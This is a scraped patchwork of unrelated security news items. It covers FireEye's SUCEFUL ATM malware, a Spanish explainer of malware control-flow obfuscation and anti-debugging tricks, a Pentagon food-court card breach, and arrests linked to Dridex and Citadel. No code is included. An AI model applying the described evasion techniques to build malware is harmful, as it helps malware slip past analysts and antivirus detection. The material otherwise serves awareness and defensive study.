The malware – detected as Backdoor.ATM.Suceful, or SUCEFUL – appears to have been created on Aug. 25, was recently uploaded to VirusTotal from Russia, and could possibly still be in its development phase, aFriday post said.
In Diebold or NCR ATMs, SUCEFUL is potentially capable of reading all credit and debit card track data, reading data from the chip of the card, and suppressing ATM sensors to avoid detection, the post said, adding that control of the malware could also be possible via the ATM PIN pad.
FireEye: First multi-vendor ATM malware targeting cardholders
Perhaps most noteworthy is that the malware is capable of retention or ejection of the card on demand, which could be used to steal the physical card. The post described a situation where a person’s card is not ejected, they walk away to ask for help, and during that time the attackers eject and steal the card.
So far FireEye has no evidence of how the malware gets installed on ATMs since it has not been observed in the wild, Daniel Regalado, senior staff malware researcher with FireEye, told SCMagazine.com in a Friday email correspondence.
Regalado said that “previous ATM threats like Ploutus or Padpin suggest that the crooks either open the upper portion of the ATM to insert a CD-ROM/ USB to transfer the malware, or hire employees with access to these machines to perform the installation.”
SUCEFUL works by interacting with middleware known as XFS Manager.
“One benefit of the XFS Manager is that it is vendor independent, similar to Java’s “Write once, run anywhere” mantra,” the post said. “This means that it can be used maliciously by ATM malware, so that it can run transparently in multiple hardware vendors. This is the case of SUCEFUL, which is targeted for Diebold and NCR [ATMs].”
For those whose cards get stuck in an ATM, FireEye recommended keeping the bank’s contact number handy so a call can be made without having to walk away from the machine.
Acuerdo con profesionales de seguridad informática, las dos razones principales de la utilización de la ofuscación del código en malware son:
Para disuadir la ingeniería inversa estática de malware. Se hace más difícil a enfocar las secciones de código más importante.
Para que las firmas estáticas utilizadas por los vendedores de AV no puedan detectar malware, ya que las firmas se basan en secuencias de bytes específicas en el binario.
Vamos a entender con ayuda de expertos de formación y servicios de hacking ético de IICS las metodologías que usan programadores de malware. Abajo hay diferente metodologías usadas por los programadores de malware para hacer ofuscación de control de flujo en malware.
Ofuscación por funciones de callback definida por la aplicación
Hay ciertas APIs proporcionadas por Microsoft, lo que nos permite registrar una función de callback. Estos pueden ser utilizados por malware para ocultar la lógica principal de su código. Pueden pasar un puntero a la subrutina malicioso como el parámetro de callback para la API. Cuando se crea window usando CreateWindowA (), el procedimiento de window se invoca con ciertos mensajes por defecto como WM_CREATE, WM_NCCREATE y así sucesivamente. Sin embargo, se ejecutará el código del virus principal solamente cuando se recibe un mensaje de window en particular explico Bill Smith experto de seguridad en la nube que maneja equipo de análisis de malware de la nube.
Ejecución a través de manejo de excepciones
Malware también podría redirigir la ejecución de la subrutina malicioso mediante la activación de una excepción. Para ello, primero se registran un manejador de excepciones utilizando RtlAddVectoredExceptionHandler () o mediante el registro de un nuevo manejador de excepciones estructurado.
Expertos de empresa de seguridad informática explican que la excepción se puede invocar utilizando cualquiera de los siguientes:
Activación de una violación de acceso a memoria, tratando de escribir en una dirección de memoria a la que no hay acceso de escritura o intentando llamar a una dirección de memoria no válida.
Ejecución de una instrucción privilegiada como STI o CLI, que daría lugar a una excepción privilegiada en modo protegido.
Realización de una división por cero para activar la excepción.
Controlar debugger
Según expertos de hacking ético, hay ciertas instrucciones especiales o secuencia de instrucciones que cuando se ejecuta en el debugger cambian el comportamiento predeterminado del debugger. Eso ayuda en ofuscación de control de flujo del código en debugger y hace más difícil entender el código.
NT 2D tiene un comportamiento especial en Olly debugger. Olly se saltará el siguiente byte en la ejecución como resultado de los cuales se ofusca el flujo de control. Esta técnica se refiere a menudo como byte scission. También tiene un comportamiento dinámico en diferentes entornos.
Overwrite RETN: Este es un comportamiento especial observado en Olly debugger. Si sobre escribimos la instrucción RETN con el código de operación, 0xC3 (que es el código de operación de RETN) justo antes de ejecutar RETN, debugger no se detiene en la dirección RETN sino que se ejecuta el código dentro del debugger.
Instrucciones chatarras
Hay varios motores polimórficos que son utilizados por los autores de malware para generar versiones modificadas de su binario que realizan las mismas actividades en la máquina, sin embargo se modifica su código explica Bill Smith experto de servicios de seguridad en la nube. Esto se utiliza a menudo para evitar firmas estáticas escritas por detectar malware por proveedores de seguridad. Una de las características importantes de un motor polimórfico es el generador de instrucciones chatarras. Instrucciones chatarras son secuencia de instrucciones que no afectan a la lógica general del código de ninguna manera, pero se colocan para disuadir la ingeniería inversa. Entre cada instrucción útil, se colocan varios bytes chatarras. Las principales razones para la inyección de instrucciones chatarras en la sección de código son:
Estos bytes chatarras podrían corresponder las instrucciones que no alteran la lógica general del código. Aumentan el tamaño de la sección de código y disuadir la ingeniería inversa, ya pesar de que estas instrucciones parecen ser legítimas y no tienen ningún impacto en el comportamiento principal del virus.
Instrucciones chatarras inyectados en el área de instrucciones corresponden a las instrucciones parciales. Esto se hace para confundir a los desensambladores que se basan en algoritmos como Linear Sweep y Recursive Traversals.
El código puede ser ofuscado aún más mediante el uso de predicados opacos que se pueden combinar con las API de Windows que siempre va a devolver un valor fijo.
Hay algunas tecinas más de ofuscación de código usado por los hackers menciona Bill Smith y alguien con experiencia en seguridad informática o seguridad en la nube puede entender fácilmente y vamos a cubrir eso en próximo artículo.
In August, we reported how Pentagon had its unclassified emailing server hacked allegedly by Russian hackers with a sophisticated phishing attack.
Now, reportedly the computer systems of Pentagon’s food court were infiltrated by hackers and resultantly the bank details of an unspecified number of employees got leaked.
The official spokesman of Defense Department, Lt. Col. Tom Crosson, revealed on Tuesday that it was possible that the bank account information of the food court employees got leaked. Employees who paid concessions at the Pentagon with either debit or credit card were notified about the hack.
Washington Examiner reports that the notification to the employees from the Pentagon read:
“Within the past week, the Pentagon Force Protection Agency has received numerous reports of fraudulent use of credit cards belonging to Pentagon personnel. These individuals had fraudulent charges to their account soon after they had legitimate transactions at the Pentagon.”
Crosson did not explain exactly how many people got affected due to the hack and only informed that the Pentagon Force protection Agency is already investigating the matter. The particular food court that was attacked by hackers also hasn’t been identified yet.
In August 2015, the United States military officials blamed Russian hackers for snooping the Pentagon’s unclassified emailing server that was being used by the Joint Chief personnel.
The cyber-attack affected the emailing accounts of about 4,000 military officials, confirmed by a U.S. official familiar with the hacking attempt.
Law enforcement in Cyprus and Norway have arrested two men considered to be key players in the creation and distribution of Dridex, respectively Citadel, two very powerful and highly efficient banking trojans.
The first is an unnamed 30-year old man from the Republic of Moldavia, which authorities have arrested while trying to cheat a bank for $3.5 million / €3.12 million.
The man was detained in a rented house in Paphos, a vacation town in Cyprus, where he was temporarily living with his wife.
The arrest was carried out after an anonymous tip was received, and sources close to the investigation claim to man was a key figure in an international organized crime gang responsible for distributing the Dridex (Cridex, Bugat, Dyre) banking trojan, as security researcher Brian Krebs reports.
The man in question seems to also have been part of the famous Business Club APT group, which operated the Gameover Zeus botnet that infected over 500 million PCs and was responsible for stealing around $100 million / €90 million from various banking and financial institutions.
Meanwhile in Norway…
Eleven months earlier in Fredrikstad, Norway, a 27-year-old Russian man known as Mark was also arrested, being detained at the FBI’s request.
According to a Norwegian newspaper, the man has been charged with running the Citadel malware-as-a-service product, used previously to infect users with spyware and exfiltrate banking-related details by logging keystrokes and capturing video and images from the victim’s computer.
Citadel operated since 2012, and there are known cases when it was also used to distribute the Reveton ransomware.
According to sources in the US Justice Department, investigators have solid evidence that Mark is actually Aquabox, Citadel’s creator and proprietor.
The Russian man has been held under house arrest for the past 11 months, authorities waiting until extradition procedures to the US are completed.
As with Mark, Dridex’s creator is now also facing extradition to the US.
Cyber Security 